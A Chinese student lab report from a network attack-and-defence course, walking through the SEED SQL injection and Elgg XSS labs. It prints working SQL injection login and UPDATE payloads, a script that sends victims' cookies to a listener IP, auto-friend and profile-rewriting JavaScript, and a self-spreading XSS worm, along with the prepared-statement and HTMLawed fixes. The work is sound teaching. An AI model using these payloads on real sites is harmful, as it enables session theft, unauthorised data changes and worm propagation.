20242909 2024-2025-2 《网络攻防实践》第十次作业

20242909 2024-2025-2 《网络攻防实践》实践十报告

1.实践内容

1.1SEED SQL注入攻击与防御实验

我们已经创建了一个Web应用程序，并将其托管在www.SEEDLabSQLInjection.com。该Web应用程序是一个简单的员工管理应用程序。员工可以通过此Web应用程序查看和更新数据库中的个人信息。此Web应用程序主要有两个角色：管理员是特权角色，可以管理每个员工的个人资料信息。员工是一般角色，可以查看或更新自己的个人资料信息。完成以下任务：

• 熟悉SQL语句： 我们已经创建了一个名为Users的数据库，其中包含一个名为creditential的表。该表存储了每个员工的个人信息（例如，eid，密码，薪水，ssn等）。在此任务中，您需要使用数据库来熟悉SQL查询。

• 对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序。

• 对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击。

• SQL对抗：修复上述SQL注入攻击漏洞。

1.2SEED XSS跨站脚本攻击实验(Elgg)

为了演示攻击者可以利用XSS漏洞做什么，我们在预先构建的Ubuntu VM映像中设置了一个名为Elgg的Web应用程序。在本实验中，学生需要利用此漏洞对经过修改的Elgg发起XSS攻击，攻击的最终目的是在用户之间传播XSS蠕虫，这样，无论是谁查看的受感染用户个人资料都将被感染。

• 发布恶意消息，显示警报窗口：在您的Elgg配置文件中嵌入一个JavaScript程序，以便当另一个用户查看您的配置文件时，将执行JavaScript程序并显示一个警报窗口。

• 弹窗显示cookie信息：将cookie信息显示。

• 窃取受害者的cookies：将cookie发送给攻击者。

• 成为受害者的朋友：使用js程序加受害者为朋友，无需受害者干预，使用相关的工具了解Elgg加好友的过程。

• 修改受害者的信息：使用js程序使得受害者在访问Alice的页面时，资料无需干预却被修改。

• 编写XSS蠕虫。

• 对抗XSS攻击。

2.实践过程

2.1 SEED SQL注入攻击与防御实验

访问https://seedsecuritylabs.org/lab_env.html，下载实验需要用到的SEEDUbuntu-16.04-32虚拟机资源，下载完成后安装配置虚拟机，结束后启动新安装的SEED虚拟机

2.1.1 熟悉SQL语句

打开虚拟机终端命令行，输入命令mysql -u root -p登录数据库，密码为seedubuntu

输入命令use Users切换到Users数据库，再输入命令show tables；查看数据库中所有的表

输入命令select * from credential;查询表项

2.1.2 对SELECT语句的SQL注入攻击：上述Web应用存在SQL输入漏洞，任务是在不知道密码的情况下登陆该Web应用程序

访问http://www.seedlabsqlinjection.com网站，随意输入用户名和密码，网站出现上图所示的提示

按F12键打开开发者工具，打开Network界面后刷新网页，发现用户名和密码如上图所示通过GET请求提交至unsafe_home.php页面进行身份检验

打开终端命令行，使用如下命令：vim /var/www/SQLInjection/unsafe_home.php打开该网站所对应的文件其中所使用到的SQL查询语句如下：SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= '$input_uname' and Password='$hashed_pwd'
如果我们输入的username字段为Admin '#，Password字段为任意值；那么我们通过上述代码组合sql语句就可以得到如下的sql查询语句：
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= 'Admin' #' and Password='$hashed_pwd'
“#”表示注释，后面的内容被注释掉，因此上述SQL查询语句也就变成了：
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= 'Admin'

这样一来我们就利用它不进行安全性检查的漏洞实现了SQL注入攻击,如上图所示仅输入Admin'#的用户名不输入密码即可成功登录

2.1.3 对UPDATE语句的SQL注入攻击：通过员工的更新个人界面实施UPDATE语句的SQL注入攻击

类似的方法，登录Admin账号后查看Edit_Profile页面的源码，看到表单通过GET方式发到unsafe_edit_backend.php页面

使用命令vim /var/www/SQLInjection/unsafe_edit_backend.php 查看后端代码，观察代码可以发现查询语句回改变不应改变的字段的值，例如假设输入nickname字段为‘，Salary='1' where Name='Ryan';#,最终结果不该改变的salary值会被成功修改

打开Edit Profile页面，在nickname栏输入', Salary='20242909' where name='Ryan';#,点击Save后发现界面中的Salary项成功修改

2.1.4 SQL对抗：修复上述SQL注入攻击漏洞

用vim打开unsafe_edit_backend.php后进入编辑模式，更改sql语句$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

修改保存后再次访问网站，无法通过Admin'#无密码登录访问，说明漏洞成功修复

2.2SEED XSS跨站脚本攻击实验(Elgg)

2.2.1 发布恶意消息，显示警报窗口

在浏览器中访问 http://www.xsslabelgg.com，并登录Alice的账号

进入到Edit profile页面后，在Brief description中输入XSS攻击代码点击保存后提示弹窗消息

2.2.2 弹窗显示cookie信息：将cookie信息显示

重复上次操作，将Brief description处攻击代码（）中的内容改为document.cookie保存再次提交即可显示网页的cookie

2.2.3 窃取受害者的cookies：将cookie发送给攻击者

打开终端命令行输入ifconfig查看本机ip地址为192.168.200.9

将Brief description处的内容换成

<script>document.write('<img src=http://192.168.200.9:5555?c=' + escape(document.cookie) + '>');</script>

打开命令行输入命令nc -l 5555监听5555端口，之后只要有用户访问Alice的主页，netcat就会接收到该用户的cookie

2.2.4成为受害者的朋友

使用Alice的账户访问Boby的主页，打开开发者工具，点击添加好友这一按钮，下方显示请求代码，说明要发送一个附带id时间戳与token三个参数的请求

再回到Alice主页中的Edit profile处，在about me模块中加入如下代码

<script type="text/javascript">
window.onload = function () {
    var Ajax = null;
    var ts = "&amp;__elgg_ts=" + elgg.security.token.__elgg_ts;
    var token = "&amp;__elgg_token=" + elgg.security.token.__elgg_token;

  	var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=45" + ts + token; 
  	Ajax = new XMLHttpRequest();
  	Ajax.open("GET", sendurl, true);
  	Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
  	Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  	Ajax.send();

}
</script>

点击保存后回到主页发现已经自动添加Boby为好友

退出Alice账户后回到主页显示的最近活动中记录了Boby成为Alice好友这一信息

2.2.5 修改受害者的信息

回到Alice主页中的Edit profile处，在about me模块中加入如下代码

<script type="text/javascript">
	window.onload = function(){
  //JavaScript code to access user name, user guid, Time Stamp __elgg_ts
  //and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;
    var content=token+ts+"name="+userName+"&description=<p>This have been cracked by alice.</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2"+guid;  
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit";
	var aliceGuid=45;    
	if(elgg.session.user.guid!=aliceGuid){
   	//Create and send Ajax request to modify profile
   	var Ajax=null;
   	Ajax=new XMLHttpRequest();
   	Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    Ajax.send(content);
  }
}
</script>

退出Alice账户后登录Boby账户，访问Alice主页后再回到Boby的个人主页发现Boby的about部分已经被修改

2.2.6 编写XSS蠕虫

<script id="worm" type="text/javascript">
    window.onload = function(){
        var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
        var jsCode = document.getElementById("worm").innerHTML;
        var tailTag = "</" + "script>"; 
        var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
 
        var userName=elgg.session.user.name;
        var guid="&guid="+elgg.session.user.guid;
        var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
        var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
        //Construct the content of your url.
        var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack again "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
        var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
        alert(content)
 
        var aliceGuid=45;
 
        if(elgg.session.user.guid!=aliceGuid){
            var Ajax=null;
            Ajax=new XMLHttpRequest();
            Ajax.open("POST",sendurl,true);
            Ajax.setRequestHeader("Host","www.xsslabelgg.com");
            Ajax.setRequestHeader("Content-Type",
            "application/x-www-form-urlencoded");
            Ajax.send(content);
        }
    }
</script>

将上述代码添加到Alice用户的about me模块中，保存后退出

登录Boby账户，访问Alice主页后回到自己主页发现about me部分再次被篡改

退出Boby账户后登录Admin账户，打开Admin的主页确认信息空空如也，访问Boby主页后再次回到自己的主页发现about me部分同样被篡改，说明xss攻击已具备传播功能

2.2.7 对抗XSS攻击

在Admin账户点击Account中的Administration进入管理界面后点击Plugins找到插件HTMLawed并点击Activate激活该插件，该插件的主要作用：对用户的输入输出进行校验并且去除特定标签。

激活后重新进行测试，发现XSS攻击失效，访问Alice主页后不在会被攻击，对抗XSS攻击成功

3.实践总结

通过本次Web安全攻防实践，我对SQL注入和XSS攻击这两种典型的Web安全威胁有了系统性的认识和实践。在SQL注入实验环节，我深入理解了如何通过构造恶意SQL语句绕过身份验证、获取数据库敏感信息，这让我深刻认识到不安全的数据库查询可能带来的严重后果。在XSS攻击实践部分，我不仅掌握了XSS的攻击原理，还初步尝试了XSS蠕虫的编写，其自我传播的特性让我对Web安全威胁的扩散速度有了直观感受。